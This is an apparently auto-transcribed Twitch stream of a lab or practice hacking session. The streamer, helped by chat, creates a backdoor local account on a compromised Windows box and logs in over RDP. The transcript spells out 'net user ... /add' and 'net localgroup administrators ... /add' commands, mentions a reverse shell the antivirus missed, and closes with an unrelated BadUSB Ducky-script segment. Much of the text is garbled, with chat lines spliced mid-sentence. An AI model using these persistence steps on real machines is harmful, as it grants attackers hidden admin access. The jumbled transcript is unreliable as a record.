Admin
we
in
will
RDP.
yeah, but
So you
yeah,
can log
but
in with
I
your new
want to
user
see
into
if I can
RDP as an
confirm it.
admin.
If I don't use add, and just use, if I do this, I'm just copying a command you'll see in a second. So if it worked, this is just me testing. This might not even be the correct command, you know. No, it didn't work. What would I do to say that I want to see the groups for this user? Or we can just try it, because, you know, checking the time on the box. 1 hour 34 minutes, because we just restarted it. But we also can copy the
Net
IP.
user username.
Okay. So, let's see if it can handle as long as this, because that net is just alias in partial, I guess.
Did you added your user to RDP?
First. Oh no, gosh, I can't arrow. I have to do it again. Net user, pred chat. Because we didn't get much of a feedback there.
Don't think so.
And we don't have any.
Christy says.
I wonder how many times the box died by itself, lol.
Yeah. At least we still have some kind of connection now. Let's ask PS okay, let me show you. PS command to add user to group, because I need to like remember
Cocaine
these.
1 PT says.
I just gave you the command to add the user to group tum.
Yeah, but I've run that. It didn't work. So I'm trying another way. Should I scroll up? Oh, wait. I'll just wait until I switch over there.
Not exactly the same, I think.
Not exactly the same. Okay. Well, I changed username to Pratchett. Otherwise, it was the same. Because I copied your text.
You didn't specify the group.
Yes, I did.
Are you adding to what?
Let's scroll up. Let's scroll up. Here, no. Yeah, invoke expression CMD net local group name username add, and then administrator. And we didn't get any feedback, so I was trying to find how to show if it was there, and then we did, and it wasn't there. So, oh my, sorry. Forgot to show you. Here. See? I'm just going to copy from the other side here. For example, to add, I can just copy this because it has the right name. So there.
Okay, I missed that one.
And then let's do also.
Well, I didn't use any of that.
Let's just try. Okay.
Use simple net commands and it worked.
Okay. I do want to learn always, and always you can do it. Too. So let's see. Yeah, you can see what I'm doing. So just to check, I'm going to actually copy. No, I'm not going to copy from this. It's definitely the right spelling for remote desktop users. So let's what? Right, I just already removed it. I think why was it so short, the command? So here, there, and now we have to type again. Net users. If there's difference between when I do it and you do it, the only thing I can think of is that it's either me typing wrong, or it's, you see, these worked. So the PowerShell native commands worked. There. Oh, sorry.
That command came from my
exclamation
notes I used, so
right screen, exclamation left screen.
No low.
So I'm thinking maybe the machine is just kind of messed up again. Anyway, these two commands worked fine. We are now in administrator and remote desktop users. So I just started this. So I don't know if this is the default port, but just if I just enter here, do we get like
Fixerbot says
questions?
New follower ToDos 1979. Less than 3.
The art of DTH. No. Welcome very much. Welcome to the stream. We got the certificate, so I would assume we have the right port, and we have you can actually see what I'm doing. That's good. So we have Pratchett, and we have password, and we'll save the password. And it didn't work. So help a poor 12 hours and 20 minutes streamer out, because yeah, tired. Should we do the domain? Will we need to do just local? Should I do a port? You that just did it. Okay? I'm waiting for your help there. Cause we got the yes there, you know? I'm thinking it's not the port. Okay, I'll just copy paste the stuff from somewhere in my notes. Somewhere.
Cocaine 1 PT says
no port needed.
Christy says
no port needed.
It doesn't need the domain for real. Is the password correct?
Cocaine 1 PT says
RDP is
password.
RDP.
Password. Though, we can see if I spelled the username wrong. Did I? We can look at this. Pratchett. And the password, password is password, because we made the user just up here. Password, here. So Pratchett password, that's the user. Or rather, it's further down, let's see. We didn't set the password this time. Yeah, we didn't set the password. So, that's why.
Yeah.
Okay. So, does that mean we don't have a password?
Sent no password. No pass. Tried.
Translated from Polish.
Yeah. So, what did you mean by that?
Free breakfast, Banana says.
Yeah, of course.
Maybe the password is
let's do
admin.
password. Okay. So, I'm going because I'm tired, so I'm not even googling. I'm at the stage of, oh yeah, let's close these. That's a good suggestion. So, I forgot to add a password to the user. Help! So, this is how it does it. So, one-liner. So we have new local user name Pratchett.
ChatGPT help you hack into a computer.
Oh yeah, it's definitely helping with PowerShell commands to create users. I don't know if that's hacking for it. So password never expires. It even added that on by itself there. So force plain is
Cocaine 1PT says.
Jesus, PowerShell syntax so weird for such simple thing.
Yeah, it's crazy. That's what we have ChatGPT for. So we don't really want to create the user. So will this work for an existing user? Apologies for misunderstanding. Yeah, that's my guess. So, because it was creating a user, and that's not what we wanted. So, set local user with the name of Pratchett password. Convert to secure string your password as plain text. Force. Well, okay. We'll just convert this in our notes. Am I blind? Yeah, there it is. No, this is not the file. Oh my, let's continue here. So now
Free
you
breakfast,
see this
Banana
for
says.
once.
It hurts when it give you a wrong answer. It's okay, GPT. It was a good try.
Oh, what I'm the most mad about is actually saying, I'm sorry. And then you say, tell it what to do more. And then it gives you exactly the same answer. And we say it's wrong again. It gives you apology and the same answer again. And you try a third time. And it does the same thing again. Maybe I'm just bad at this, but that is kind of annoying. Just kind of a little annoying. So, let's go here, and I'm actually let's just type a letter and
Cocaine
delete it.
1PT says.
It's simple bot. D.
Yeah, it's simple. And the thing calling it AI? Nah. Set local user name, Pratchett password, convert to secure string password. well, these two last ones, I don't know what. We'll see. And maybe they are needed for the convert to secure string. And the input is as plain text, so that could be it. And now, if we just try at once to do this with password, we'll see if GPT was right. Cannot connect to RDP server. Was it only me that thought that was different?
Is your machine alive?
Yeah, that's my first thought. Is it alive? Did it die? Well, we'll try another time, because that was a different answer.
Free breakfast banana says.
If we train bots to do things like how we would do them, they would ask other bots for the answer.
Cocaine 1
yeah,
PT says.
That's true, that's
and
true.
IP is correct?
The IP is correct, yeah. So let's see now. Username, we have Pratchett. And since I've already actually finished the box, you know, this is just for learning. And I will have to go to my family even if this does not work. So I'm not restarting the box again if that's the problem.
I did
Oh,
both
you
methods
did both
also.
too, yeah.
He
So
suggested me the same.
okay. So let's just make a new user, and if it doesn't work, we'll. I can't copy the lines, but let's just. I can't arrow up, you know. So this is what we did to create the user. So carefully pressing both Shift and Control when pressing C, because I do not want to do the thing again, you know, again. I actually have it there. And now we're going actually to GPT again, because add password to. So that's the simple way
Christy
to do
says.
it.
UCN copy pasta with mouse for safety.
Yeah, great tip. So do that at the prompt. So here when we added the user, we should have done. Let's compare these now and see. Oh, look. It had already got the PowerShell thingy going there. This is annoying. Where's the end one? Doesn't have one. So it doesn't actually have one. That's why I didn't see it. So the only thing it added was just the password. There. And now let's call this Pratchett 2, just because we still want. Oh, let's do Terry. Let's do Terry then. Now we're adding user Terry. And this is what we'll copy. And let's go here. And I'm just typing in letters so that I pop down where we were. And we're adding a new user. And this time we remember to add a password. There. And I'm not going to test if these work. I'm just quickly going to replace in all the commands. To add them to groups. So I'm just copying and we're going to paste here. And
Cocaine 1
the
PT
second
says.
one.
Did it create it?
I'm not checking. I'm just doing. 'Cause time limit. There. So we're over 12 hours. We're over 12 hours.
In CMD, it shows some output saying success.
Yeah, it did
Free
say
breakfast,
success
Banana
before here
says.
too.
She's admin now, bro.
Yeah,
Cocaine 1 PT says.
Pre-breakfast banana and
see.
low.
Oh my god, these were the commands that didn't work. Why did I use these commands? You see, I was actually trying to add the user again. These are the commands that didn't work. Let's just... why do I still have them in my notes? Let's do Terry here. Let's do Terry here. So now we're going to use the commands that work. Sorry. This is because I have not been careful with my notes because I'm in a hurry. I'm going to remove that last command. So, and let's just, for checking net users Pratchett. No, Terry. Okay, so something didn't work. Cause I didn't do the I didn't do the first command. I have to go up all the way to the top and run the command that worked to create a user. This failed. We try to find the version. And this is a working command. And I'm doing Christie's safe copy. And we're removing all of the other stuff.
Free breakfast banana says.
You can do it. It seems so close.
I just feel like I'm...
Christy says.
Time thief.
Will be on mobile walking dog, D.
Cocaine 1 PT says.
Your whole day has passed and I'm like still here. Though I've not been doing this machine for 12 hours. Thank God. You know. There. So let's just type anything, pop down there, and that should give us an actual feedback. Yeah, there, you see? And the other commands, they didn't work since there was no user. And we also have the actual PowerShell commands.
Free breakfast banana says.
Oh yeah.
So who can see what error I made? What error did I redo? What error did I do? Something that we had to create a new user for?
Does it say that if there's an error? Does
No.
cmd.exe complete but not the
we
net
got an
user
error
part?
now. So this command didn't work. We couldn't create a user when we added the password. So this is ChatGPT. We should actually Google this because ChatGPT doesn't know what it's talking about. Okay? We need to know how to, or we do it the PowerShell way. And that is probably also actually. So we can try give ChatGPT one more chance.
Ask Google Bard what's Chaptic's problem.
Don't you have to use... No? Yeah, we could do that, but not now when we have time. Add a user with PS. So, new local username, Pratchett password. And this is what we got before, right? Your password. So, now we actually wanted you. That we didn't want when we were trying to add. Because this one doesn't work. It's bad. Delete. Because we can create a user. But we can't. We just need to edit the password. And we need to add this. And let's call it 32. This is like, people, hello. How many tries did you need to manage to get a password in the user when you created it? So, if I didn't have these characters, I could copy all 3 lines, but we do have those characters. So,
Cocaine1
third
PT says.
try.
BTW, next time try bigger password like password 123.
Alright, we should
password
have
policy,
better
it will fail.
security. We should have 1, 2, 3 too, yeah. I'm just doing these. If they don't work, I think I'm actually going to stop streaming anyway. But maybe I won't be able to. So I can't users Terry 2. Look, it's working. So we had no feedback, but it worked. And the previous
It's
one
not
was,
security,
was the...
it's about password rules, min length.
Free breakfast banana says.
Okay.
Holy moly.
Okay, so you're thinking there may be a rule. So now we have Terry2 and we have password and we click OK. And my time says it's 21 and we didn't get... So what did you do? You just use net use commands, net user and these things, right? But I'm seriously thinking that, well, if it's a password length...
Cocaine1 PT says.
Not saying it is. I used exact commands I gave you.
Mm-hmm.
And it worked low.
Okay,
Net user
so...
cocaine2 password 123 /add.
Christy says.
I'm doing some changes.
He means password policy.
Yeah,
Cocaine1
I'm
PT
thinking
says.
I'm adding stuff.
Net locale group remote desktop users cocaine2 /add. Net
So-
locale group administrators cocaine2 /add. This exact command's low.
I don't need the commands,
Free
I just
breakfast
need the
banana
password
says.
there. So
Oh,
I'm
great.
adding a longer
Now I
password.
need to throw away my Windows computers.
Cocaine1 PT says.
Straight from my
So-
notes.
There, see? Longer password. So let's create... I've just updated my commands. And I know these commands work. So we can give this 2 more minutes. There. Terry3. Password with a big P, 1, 2, 3, and exclamation mark. Look. We got more feedback. So maybe the password policy was there. This is a good thing to know
Christy says.
for the future.
Checkbox time.
Yeah. So now, if we paste this one, will we get feedback? No, we didn't. So if we copy this, and this is GPT commands. So if we do net user, what on earth do I usually, what did I do? Yeah, the name, of course. User Terry3. I'm feeling my brain not optimally remembering that I should add the user. So we have the groups again, and this time it seemed the password was happier because we got feedback there. So I already entered the information. Now the account should exist. So we're actually connecting. So
Cocaine 1 PT says.
Smile, smile.
we need a redeem for that, right? Reboot require. So we have this tiny little window. Malware.bot says we need to reboot server manager.
So the system has AAV.
Yeah.
And this catch the roof shell. What an amazing AV. Didn't.
Yeah, it didn't. So if I do like this, no, this doesn't help. I know there's something here, right? Scale mode. Well, of course we could do that. Isn't there a button just to let Windows know that we want a bigger size? I think there is, right?
Well, you made it.
Yeah. I don't know what we could do here, but we already have everything. So the learning thing here, except for the commands to
Christy
create,
says.
was
Nice, that was
use
funny,
a better
indeed.
password. Yeah. So these are the working commands. So we can just delete the rest. And then we
Cocaine
can
1
also
PT
do...
says.
Sure, it's about policy.
Yeah. So net user Terry
That's why I told you that.
3. Yeah. To confirm. Thank you for that. So that's good. I learned a lot on this. So thanks everybody that have helped. Do you have any raid suggestions? And don't leave before we raid. That's not a... You're not allowed. And also,
Well,
thank
time
you very
for
much
dinner.
for the
Have a
help.
good night.
And thank you for the company.
Getting late here.
So I'm just inviting everybody to Discord
See you
again.
around. Smile, smile.
Yeah. See you around. Thanks again. Let's just see who we got. So, I wonder if let's pause that. My goodness, this will probably... Oh, we have security FED too, but he doesn't really do much Twitch. But you should check Cody out. Should we raid Cody? He won't notice, will he? I will have to raid Cody. Did they just start? We have to see if he just started or if they're ending. It's just a short one.
And
5
cool to see
minutes.
that there is some support, and
So,
basically this is all you need
we
to
have
do
a raid target
in order to set up this Ducky script thing. So at a certain point, then you
Raid.
just call the do Ducky script function, which I
There,
wrote myself,
so
and it basically just runs all the code.
thank you
in
so
Ducky
very
script.
much
So
for
making
helping,
something
for
that is
being
really,
here,
really
for
small and easy
making
to
this a
use
fun
as
thing.
a bad USB device,
Yeah.
I thought this was cool. But my
Instead
first
of
thought
just
is,
rebooting
why
bots.
don't I strap
Rebooting
a LoRa
bots.
module onto
It's
this and
rebooting
stretch it
bots.
so it can go really, really far, and it doesn't rely on any other sort of data connection. So I'm going to be working on this more. You can expect a video on this, but I just wanted to talk a little bit
We're
about
raiding now.
yeah, like these cool hardware things I've been mashing together. As a kid, I was very much